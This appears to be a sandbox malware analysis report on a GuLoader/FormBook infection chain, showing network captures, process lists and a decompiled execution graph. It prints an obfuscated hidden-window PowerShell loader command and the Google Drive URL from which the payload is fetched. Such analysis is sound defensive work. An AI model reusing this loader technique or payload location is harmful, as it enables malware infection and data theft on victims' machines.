                        Oct 22, 2024 16:04:34.629060030 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.629153013 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.629189014 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.630678892 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.630734921 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.630744934 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.630776882 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.633418083 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.633477926 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.633500099 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.633534908 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.634037971 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.634078026 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.659013033 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.659140110 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.659204960 CEST49715443192.168.2.9142.250.186.97
                        TimestampSource PortDest PortSource IPDest IP
                        Oct 22, 2024 16:04:28.808538914 CEST5616453192.168.2.91.1.1.1
                        Oct 22, 2024 16:04:28.815854073 CEST53561641.1.1.1192.168.2.9
                        Oct 22, 2024 16:04:30.168169022 CEST6118853192.168.2.91.1.1.1
                        Oct 22, 2024 16:04:30.177119017 CEST53611881.1.1.1192.168.2.9
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 22, 2024 16:04:28.808538914 CEST192.168.2.91.1.1.10x2633Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                        Oct 22, 2024 16:04:30.168169022 CEST192.168.2.91.1.1.10x76c7Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 22, 2024 16:04:28.815854073 CEST1.1.1.1192.168.2.90x2633No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                        Oct 22, 2024 16:04:30.177119017 CEST1.1.1.1192.168.2.90x76c7No error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                        • drive.google.com
                        • drive.usercontent.google.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.949713142.250.184.2384434512C:\Users\user\AppData\Local\Temp\Apathism.exe
                        TimestampBytes transferredDirectionData
                        2024-10-22 14:04:29 UTC216OUTGET /uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                        Host: drive.google.com
                        Cache-Control: no-cache
                        2024-10-22 14:04:30 UTC1610INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 22 Oct 2024 14:04:29 GMT
                        Location: https://drive.usercontent.google.com/download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download
                        Strict-Transport-Security: max-age=31536000
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'nonce-cUCdgxe7Gq0IrDWtjLqnkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Cross-Origin-Opener-Policy: same-origin
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.949715142.250.186.974434512C:\Users\user\AppData\Local\Temp\Apathism.exe
                        TimestampBytes transferredDirectionData
                        2024-10-22 14:04:31 UTC258OUTGET /download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                        Cache-Control: no-cache
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-10-22 14:04:34 UTC4899INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="sjODtFtoTrKc111.bin"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 288320
                        Last-Modified: Mon, 21 Oct 2024 07:32:30 GMT
                        X-GUploader-UploadID: AHmUCY0TXP1zVtYXuu94Ayf9g423KBXNlAMWp2YoDXfftoElbjxcR1NkCPKDgVvMUvjomn0GH47pCCx3iQ
                        Date: Tue, 22 Oct 2024 14:04:33 GMT
                        Expires: Tue, 22 Oct 2024 14:04:33 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=6iH+ig==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-10-22 14:04:34 UTC4899INData Raw: 7b 74 19 24 d4 d0 28 33 6e 02 9a 39 6f ea 46 20 ba e4 ba 2a 6c da ca a4 88 07 b0 22 dd db 07 a7 4e 83 2b 57 45 cd eb ca b2 7d 0e f6 84 37 30 3c 92 c6 23 72 ee 32 fa 84 14 9e e4 39 c4 37 58 41 57 b3 ca 51 27 e6 0d 9f b0 29 78 98 c9 33 96 e0 89 ed e9 60 78 b3 41 06 40 4e b2 4e c2 5f 16 c9 97 2d 76 af b6 09 6d d1 22 e4 69 ed f6 a0 2d 70 86 1d 0d 53 78 d8 65 32 36 59 93 4c 66 52 c3 4f 71 8f b4 8b 6d 7b 13 1c 8d 0b 78 d7 0d 2f 58 bd 32 04 20 d7 6f 2b e3 08 51 99 c5 9e 29 4b 78 5e 1f da d2 a7 72 6b 30 ca a8 74 12 87 e3 10 50 10 05 ac 81 3f 84 bd 71 3e f0 f0 71 9c dc 02 be 4d 29 67 42 22 04 4a be e4 01 bf fd bf be 59 94 14 ac de 3e a4 8b 1c 70 cf db 70 48 6d 61 17 26 e3 db 51 13 02 20 27 b3 fa 2e de f2 05 b1 81 7f b4 cb 2d 6c 4d 41 84 d0 b6 7c de 19 35 10 98 85
                        Data Ascii: {t$(3n9oF *l"N+WE}70<#r297XAWQ')x3`xA@NN_-vm"i-pSxe26YLfROqm{x/X2 o+Q)Kx^rk0tP?q>qM)gB"JY>ppHma&Q '.-lMA|5
                        2024-10-22 14:04:34 UTC4899INData Raw: d9 0a c8 d9 9c a9 54 d6 c3 bb e8 22 0b c5 68 49 f2 47 c5 08 09 51 b7 34 7f ed 25 1c 6f d5 a4 a0 a1 c4 19 79 15 b4 71 02 6c ef fe dd 8f fc dc 11 ea 1d 7b 84 47 c9 01 80 65 27 86 27 94 dc 20 62 77 93 27 5c 54 85 96 56 ed 3a 14 fe b0 a5 0e 59 08 03 f4 3b 4d 64 44 eb d8 b6 af 88 84 e5 39 66 2a 33 0b ae 4b 8c 10 29 96 28 19 1c ef c1 37 86 9a 4c fa 06 85 75 a8 9f 16 13 ad ca 4a c6 00 ea a7 eb 73 4c 46 b9 e7 e4 59 ff 19 34 81 5a 21 9d 60 12 e5 35 c7 40 ad d7 12 5e b0 b4 db 52 aa 19 7e 42 d4 09 90 02 0f ea 29 00 80 86 13 aa f8 6a 79 1d 70 44 1b 0f 87 a7 f8 23 ba c1 4f 1c 85 d7 65 74 40 2d 1d 15 ae c7 90 bf 0f c7 03 9c 62 1e c5 36 c9 20 2a 0e e9 28 cd 9e f4 7c 32 65 53 55 48 06 9b d9 87 ed ef f8 1e 43 90 b3 9e e4 e6 8c f5 41 49 fe ce 4e c2 1b 83 8e b8 8c 01 43 f5
                        Data Ascii: T"hIGQ4%oyql{Ge'' bw'\TV:Y;MdD9f*3K)(7LuJsLFY4Z!`5@^R~B)jypD#Oet@-b6 *(|2eSUHCAINC
                        2024-10-22 14:04:34 UTC1324INData Raw: fa 27 9a 2e d6 b1 14 26 53 d4 c1 c4 e7 b0 c2 56 20 de 6a f8 71 11 d8 d1 d3 0a 51 e1 72 63 56 a5 28 5e 36 f4 88 22 19 32 25 a1 71 9e 15 ee 87 e7 90 c1 cf 1c e2 8d 62 fe c3 4b 19 1b 68 67 f9 de 11 e5 9e 4a 68 b6 94 12 ae 01 ef 9f 51 9d 14 8c 3b 07 fd 01 c0 a2 a9 5f 59 c9 68 8f 01 9c a2 ae 02 c5 fb 03 79 4d 71 ff 66 26 59 c1 44 2e 56 e1 9f 7d 9c e8 61 e3 fc 23 6e 1e 7b b1 38 18 f3 a6 cd 93 e4 9c b5 ef 92 1e f2 de f9 d5 81 c7 e5 78 a7 6a e0 d2 09 e1 6e 88 5b 66 5c 1b ba 28 5c 04 fb ba 1d cf 4f 4f f5 fc ca 54 fa cd 02 0b e7 ff b0 1f 46 ab 33 2c 16 33 68 29 c3 e4 ba 60 ec d9 5b 08 e1 0e 64 47 c2 a4 a4 e3 5a d3 91 a6 ea 7d 71 67 d6 bd 24 a0 7b 58 fb e1 ce 8b 2d 92 b4 0d 08 63 40 a1 44 bf ce cb f1 dd b9 53 40 1c dc e5 c1 4e ea c1 ec 05 00 ff 8f b9 54 08 2d 9a e6
                        Data Ascii: '.&SV jqQrcV(^6"2%qbKhgJhQ;_YhyMqf&YD.V}a#n{8xjn[f\(\OOTF3,3h)`[dGZ}qg${X-c@DS@NT-
                        2024-10-22 14:04:34 UTC1378INData Raw: 7a c9 e0 8e fc d3 b5 3b dc 02 bb ae 22 14 18 6d 74 be 5f a4 63 07 ac 40 04 6b 25 11 e9 27 d9 84 2a 57 16 eb 46 12 14 1c 40 87 b2 99 ae 80 ec a6 bb a5 ca 10 3f ba f2 a4 2a c9 9b 99 0e b9 90 ba 6f 3e 77 fc a2 d8 36 d7 46 74 95 bc 3e d5 77 6c 40 10 45 d3 26 23 50 68 f6 da 93 5c 1f d7 ea f9 b8 bd bb 1d c2 16 33 5f 21 d0 33 f7 7e 73 1a 51 5e 0e 58 f0 54 ca 36 aa ef 60 b3 30 ac 21 6d 03 dc 6f c1 7b 30 2c cf 30 23 6a cc bb d2 fd 20 2e 4b 7a f0 cc c8 b2 9e ff 1d e5 7d 84 a3 9e 03 9f 6e 17 4a 81 c7 47 f7 51 6b 10 86 3c d1 95 f6 49 19 2c f2 e5 83 e8 fd 48 5c 3e 72 b0 86 dd 2a a6 2e 0a 9d 60 fc 11 ed 99 38 ed 1d 64 2a ae 82 34 b0 e8 3d 47 49 6d 3b 25 f3 77 f6 32 63 38 af 79 ac 22 18 5d 6e 7f 52 e2 92 56 0e 8e 5c b5 e1 35 fb c6 a1 4d 36 82 de f2 d2 09 53 4c 8e 2d c3
                        Data Ascii: z;"mt_c@k%'*WF@?*o>w6Ft>wl@E&#Ph\3_!3~sQ^XT6`0!mo{0,0#j .Kz}nJGQk<I,H\>r*.`8d*4=GIm;%w2c8y"]nRV\5M6SL-
                        2024-10-22 14:04:34 UTC1378INData Raw: cb 03 f0 47 c8 31 e2 8d 53 39 fe 96 8c 28 3b 99 61 bb b3 0d 0f ca 34 3c 66 69 22 32 14 0e 98 c8 40 cc 3f 29 a7 e3 e6 5a 09 a7 cb 4a d2 02 8d d2 5f df 72 81 ab 5c 3d 0f 6c 32 4b 43 e8 56 4f 9c 1f ce e3 dd 77 53 8f 22 1b 57 e5 d0 5d fc 27 56 c2 73 a4 9c 2f 5e 62 b6 0b 52 07 b9 35 f0 9e 91 90 3f f4 95 be 23 cf ad 3f dd 2d 76 9c 40 b6 d3 d1 22 e4 82 ea 7b 04 09 70 86 1d 0d eb c5 f4 87 21 c1 b0 52 b6 dd d9 09 8e 96 8f 0d 4f 18 22 23 a4 bc c5 51 10 b5 02 3f 2a d6 3e 00 a8 ab 40 b3 2a cf 81 ed 15 9b db e9 ce e3 fe 87 85 d1 dd 4d 9f f5 0d 0e 40 94 a9 bc 8e 68 c3 e5 e2 41 b7 61 21 23 1b b0 66 d8 89 64 8c bb 79 48 58 4c c7 9f af 5b b9 fc 2a 74 d7 32 1d b4 f3 54 96 59 63 14 fe 4c da 62 9d 94 fc 87 3b 00 82 b9 b7 9d b9 03 78 7c b7 ed b7 34 4f 4a 47 cb 94 6a 4d 41 84
                        Data Ascii: G1S9(;a4<fi"2@?)ZJ_r\=l2KCVOwS"W]'Vs/^bR5?#?-v@"{p!RO"#Q?*>@*M@hAa!#fdyHXL[*t2TYcLb;x|4OJGjMA
                        2024-10-22 14:04:34 UTC1378INData Raw: b9 7c 90 8c 6d b9 65 4b d1 9b 5a 2b 49 83 5f 17 b8 77 ff b7 a3 62 98 74 d1 87 ac 88 2f 8e 6f 71 d6 ee 0a 03 24 9a a4 6d 0e b4 1f 04 93 50 b2 f3 58 13 30 a4 c4 cd d6 fa 61 51 5f cc cb 77 4f d9 ab b3 99 95 15 ac dc f3 22 ea 3b 9d ad f0 df ed 8a 53 ae 2f fc 42 8f 04 17 80 97 3f 47 eb bd 81 a2 dc fd ca 58 e6 8c f3 72 24 3f 2d a3 9c 65 4d bc 43 cc fd ab 74 90 2b de 92 14 88 db 72 ed b1 77 8f 8b e1 a5 77 c7 10 6a 08 14 ac d9 77 75 33 5c 04 5e 86 49 c4 09 da 8c 02 2a 2b 11 ae 63 31 57 01 e4 10 f2 a4 11 84 33 27 23 70 f4 e0 63 4a f0 4b 7f 3c 83 90 8d 81 50 73 f0 8e f1 07 c5 19 8e 72 c3 85 9d 86 64 3d d2 84 0e 5c 90 c4 78 bf 63 07 82 30 e0 2b ce 08 9d 0b c4 22 cd 5b 05 29 a4 d7 3f 77 06 d4 44 3a 1e 6c c4 4a ff 8f 8b a7 cf 01 44 66 ad f1 e1 1c b5 7e 6f 67 54 52 8a
                        Data Ascii: |meKZ+I_wbt/oq$mPX0aQ_wO";S/B?GXr$?-eMCt+rwwjwu3\^I*+c1W3'#pcJK<Psrd=\xc0+"[)?wD:lJDf~ogTR
                        2024-10-22 14:04:34 UTC1378INData Raw: 86 2d 99 13 3b 44 97 98 d3 18 ae 05 ff 10 b8 84 8b 78 79 b0 e1 0d 92 2e 2d ca 56 7f d2 ea 26 cb e4 07 bc 3e 1e f0 52 d8 83 af 34 aa e3 5a 2f c7 8c e9 f4 09 28 d8 6c d9 4a 69 30 b0 51 95 8c ce 82 8f 90 12 a6 dd db 7c 60 62 30 17 e9 80 12 b3 41 d0 23 d8 4a d7 19 91 0c 00 6f e1 93 27 6a 97 6c b9 37 25 52 6a 51 78 9a 83 2e fe 55 7f 11 f8 85 1b 91 e0 b2 78 97 cb 36 5f e9 3b 0b 9b 70 a1 22 6d 70 2f 99 cb 72 93 dc d7 b4 0c bb 7f e1 be 55 26 8b f1 88 1e d4 3d 00 3e 7a 32 26 37 87 f4 bb dc f2 2c 27 76 6d ba c4 02 a9 8b d8 ed f1 fb 6f ca 99 aa 18 d6 73 c1 73 f3 b3 fa 7b 75 2a 67 53 95 2d 6f a7 f0 18 d2 bf ec a1 31 8d 85 f4 68 45 37 44 6b d2 53 e9 df 90 f0 60 dc 1b d3 27 6b 1e 8c 88 1b e0 5b 15 92 f5 1a 9a 71 3b e1 37 21 7e 32 8c 8a 1d 02 28 29 8c 07 a3 0b 1f c3 c0
                        Data Ascii: -;Dxy.-V&>R4Z/(lJi0Q|`b0A#Jo'jl7%RjQx.Ux6_;p"mp/rU&=>z2&7,'vmoss{u*gS-o1hE7DkS`'k[q;7!~2()
                        2024-10-22 14:04:34 UTC1378INData Raw: 4d d3 52 c6 73 81 00 b6 8a af 3d 76 81 56 d1 f5 75 d8 4b a6 09 bc 06 42 c6 cf 4c 85 e3 e0 8b 09 03 06 d1 da d3 ee cf 08 51 d6 f8 92 91 6d 97 87 75 a4 e8 d2 a1 4b 1b 6f 36 9f 7d be 19 fb 2f 3c da 84 f1 b1 1c 89 4a 38 fc af b2 be 54 77 33 eb 34 18 a7 d8 4d f9 37 54 38 5e 4b 7b 2a 8f c6 50 75 04 8d 6e 3f e7 c7 e4 fe b0 d5 ea 96 18 f2 15 0f d5 bc 18 38 2b 7e 62 53 0a 06 00 cc 00 da c7 8c 0e e0 37 6c fe bd 8d a3 34 ab 29 42 70 50 35 ec 99 0b 94 9d cf d7 ec a9 8f 7e 24 ec d0 28 97 a8 4d 3d dc a0 67 ff 58 64 ba 6b 09 6f 23 48 69 3b 8a 61 87 d1 13 ac ad bf d6 79 bd d7 39 e8 3a f3 a8 ab 3f 37 67 52 06 12 c0 e8 45 c6 ab 67 ec 91 25 95 3d 17 9a 46 bb 60 dc aa 42 02 01 42 71 a3 19 3d 61 b7 ee 30 2f d0 50 9e 87 0c b8 ed 56 05 eb 99 18 5d 77 f1 ae 08 bc 82 3e 64 b2 84
                        Data Ascii: MRs=vVuKBLQmuKo6}/<J8Tw34M7T8^K{*Pun?8+~bS7l4)BpP5~$(M=gXdko#Hi;ay9:?7gREg%=F`BBq=a0/PV]w>d
                        2024-10-22 14:04:34 UTC1378INData Raw: 98 5b bc fb 68 59 51 cc 11 a7 e2 f4 67 15 0d ac 06 49 0e 11 f8 17 da e8 5d a9 2c 2f 9b f0 96 8c 70 20 08 7e 32 b3 5c 6c 9c 43 f5 0c 13 52 7b d3 04 81 54 6a 1b 9b 89 fb 43 61 45 ec 36 13 b0 8d 05 af fe 1e 43 4b 0a 3f 74 72 c7 7e 27 30 30 f1 f0 be f1 77 a3 f2 9c 26 b3 86 e7 83 d7 88 2b a6 f6 2d 47 6d b3 c9 2c ab 70 74 d4 bb fe 88 5c 90 74 fa 52 49 3b f3 eb 36 30 81 c9 bb 2c 5a 05 d0 cf e4 31 be 55 35 44 b9 06 2b 7b ac 3c 3a fe 0f 08 14 08 c9 b3 f5 16 5d 4e 16 25 c0 c8 6c ba fa 15 38 8d ff e5 b1 26 00 e6 ff eb f7 34 da 6b b0 7f 24 e7 76 9f b2 42 04 28 5d a5 e7 8c 28 19 9f a8 21 89 70 f4 46 67 ae 04 af eb 2d 3a 8d cd 77 32 84 2c a4 3d 24 38 c4 b9 a9 3e b5 e0 19 c6 cd 91 6e 88 ec aa 84 c4 db 27 87 9b 1b 96 f3 dd d2 02 f9 a0 53 ca b6 01 dd 7d 62 52 ef bb 5d 18
                        Data Ascii: [hYQgI],/p ~2\lCR{TjCaE6CK?tr~'00w&+-Gm,pt\tRI;60,Z1U5D+{<:]N%l8&4k$vB(](!pFg-:w2,=$8>n'S}bR]
                        2024-10-22 14:04:34 UTC1378INData Raw: 41 43 55 49 b0 a2 61 7a d8 a2 0c 23 11 73 c3 77 65 1c f3 ad 0a 46 6a 47 1e 82 c5 1a 3d 12 9a f3 51 f3 a9 53 bc e4 51 e3 66 b5 40 07 83 fd f8 80 33 a8 0d c0 6f a2 01 a0 a2 0b d1 90 da b9 f4 a9 89 3e 16 09 49 06 db 5e 7e d4 22 54 05 bc 23 0f c2 48 45 e9 2f 40 51 48 43 c9 cd cf 7d 1e ff f2 5b 45 f9 40 0c 57 09 87 69 d7 b3 e4 99 bc 8b e0 19 41 18 4b 41 ec d9 dd 4e 6e 55 c5 0e 64 fa 21 ab f5 6e fd 5b 21 6c 31 e8 fc ec 3b fa 78 1a 4d 53 3f 25 c1 5e bc f6 f5 8f 15 71 79 b5 3e c8 0f 06 18 62 97 c3 01 eb d9 9e ac a1 43 41 54 3b ed 38 db 1b db fd 1a 56 6c b5 a3 8e 4e 1a c5 0b 99 b8 1d 3b c9 41 d3 f1 1c 93 60 71 40 e8 08 24 3e 08 bb ca 1f e9 55 e0 18 0f 1c c1 07 f5 c0 13 da ff 7e 13 29 34 fe f1 2a 8c 44 83 8c 3b 4b 2b 6d 9f 7c 28 52 84 d7 7d 3a 9d 77 3c 12 26 73 7d
                        Data Ascii: ACUIaz#sweFjG=QSQf@3o>I^~"T#HE/@QHC}[E@WiAKANnUd!n[!l1;xMS?%^qy>bCAT;8VlN;A`q@$>U~)4*D;K+m|(R}:w<&s}


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:10:03:08
                        Start date:22/10/2024
                        Path:C:\Users\user\Desktop\Justificante.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Justificante.exe"
                        Imagebase:0x400000
                        File size:777'760 bytes
                        MD5 hash:73FD5954CB5BE48EA11D738097FDDA5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:10:03:14
                        Start date:22/10/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)
                        Imagebase:0xa90000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2157643801.000000000D563000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:10:03:14
                        Start date:22/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:10:04:20
                        Start date:22/10/2024
                        Path:C:\Users\user\AppData\Local\Temp\Apathism.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Apathism.exe"
                        Imagebase:0x400000
                        File size:777'760 bytes
                        MD5 hash:73FD5954CB5BE48EA11D738097FDDA5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 39%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:25.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.2%
                          Total number of Nodes:1411
                          Total number of Limit Nodes:40
                          execution_graph 3226 4015c1 3245 402d3e 3226->3245 3230 401631 3231 401663 3230->3231 3232 401636 3230->3232 3236 401423 24 API calls 3231->3236 3269 401423 3232->3269 3242 40165b 3236->3242 3240 40164a SetCurrentDirectoryW 3240->3242 3241 4015d1 3241->3230 3243 401617 GetFileAttributesW 3241->3243 3257 405e3e 3241->3257 3261 405b0d 3241->3261 3264 405a73 CreateDirectoryW 3241->3264 3273 405af0 CreateDirectoryW 3241->3273 3243->3241 3246 402d4a 3245->3246 3276 406579 3246->3276 3249 4015c8 3251 405ebc CharNextW CharNextW 3249->3251 3252 405ed9 3251->3252 3254 405eeb 3251->3254 3253 405ee6 CharNextW 3252->3253 3252->3254 3256 405f0f 3253->3256 3255 405e3e CharNextW 3254->3255 3254->3256 3255->3254 3256->3241 3258 405e44 3257->3258 3259 405e5a 3258->3259 3260 405e4b CharNextW 3258->3260 3259->3241 3260->3258 3314 406931 GetModuleHandleA 3261->3314 3265 405ac0 3264->3265 3266 405ac4 GetLastError 3264->3266 3265->3241 3266->3265 3267 405ad3 SetFileSecurityW 3266->3267 3267->3265 3268 405ae9 GetLastError 3267->3268 3268->3265 3323 4055a4 3269->3323 3272 40653c lstrcpynW 3272->3240 3274 405b00 3273->3274 3275 405b04 GetLastError 3273->3275 3274->3241 3275->3274 3280 406586 3276->3280 3277 4067d1 3278 402d6b 3277->3278 3309 40653c lstrcpynW 3277->3309 3278->3249 3293 4067eb 3278->3293 3280->3277 3281 40679f lstrlenW 3280->3281 3283 406579 10 API calls 3280->3283 3286 4066b4 GetSystemDirectoryW 3280->3286 3287 4066c7 GetWindowsDirectoryW 3280->3287 3288 4067eb 5 API calls 3280->3288 3289 406579 10 API calls 3280->3289 3290 406742 lstrcatW 3280->3290 3291 4066fb SHGetSpecialFolderLocation 3280->3291 3302 40640a 3280->3302 3307 406483 wsprintfW 3280->3307 3308 40653c lstrcpynW 3280->3308 3281->3280 3283->3281 3286->3280 3287->3280 3288->3280 3289->3280 3290->3280 3291->3280 3292 406713 SHGetPathFromIDListW CoTaskMemFree 3291->3292 3292->3280 3299 4067f8 3293->3299 3294 40686e 3295 406873 CharPrevW 3294->3295 3297 406894 3294->3297 3295->3294 3296 406861 CharNextW 3296->3294 3296->3299 3297->3249 3298 405e3e CharNextW 3298->3299 3299->3294 3299->3296 3299->3298 3300 40684d CharNextW 3299->3300 3301 40685c CharNextW 3299->3301 3300->3299 3301->3296 3310 4063a9 3302->3310 3305 40646e 3305->3280 3306 40643e RegQueryValueExW RegCloseKey 3306->3305 3307->3280 3308->3280 3309->3278 3311 4063b8 3310->3311 3312 4063c1 RegOpenKeyExW 3311->3312 3313 4063bc 3311->3313 3312->3313 3313->3305 3313->3306 3315 406957 GetProcAddress 3314->3315 3316 40694d 3314->3316 3317 405b14 3315->3317 3320 4068c1 GetSystemDirectoryW 3316->3320 3317->3241 3319 406953 3319->3315 3319->3317 3321 4068e3 wsprintfW LoadLibraryExW 3320->3321 3321->3319 3324 4055bf 3323->3324 3332 401431 3323->3332 3325 4055db lstrlenW 3324->3325 3326 406579 17 API calls 3324->3326 3327 405604 3325->3327 3328 4055e9 lstrlenW 3325->3328 3326->3325 3330 405617 3327->3330 3331 40560a SetWindowTextW 3327->3331 3329 4055fb lstrcatW 3328->3329 3328->3332 3329->3327 3330->3332 3333 40561d SendMessageW SendMessageW SendMessageW 3330->3333 3331->3330 3332->3272 3333->3332 3334 401941 3335 401943 3334->3335 3336 402d3e 17 API calls 3335->3336 3337 401948 3336->3337 3340 405c4e 3337->3340 3379 405f19 3340->3379 3343 405c76 DeleteFileW 3345 401951 3343->3345 3344 405c8d 3346 405dad 3344->3346 3393 40653c lstrcpynW 3344->3393 3346->3345 3411 40689a FindFirstFileW 3346->3411 3348 405cb3 3349 405cc6 3348->3349 3350 405cb9 lstrcatW 3348->3350 3394 405e5d lstrlenW 3349->3394 3351 405ccc 3350->3351 3354 405cdc lstrcatW 3351->3354 3356 405ce7 lstrlenW FindFirstFileW 3351->3356 3354->3356 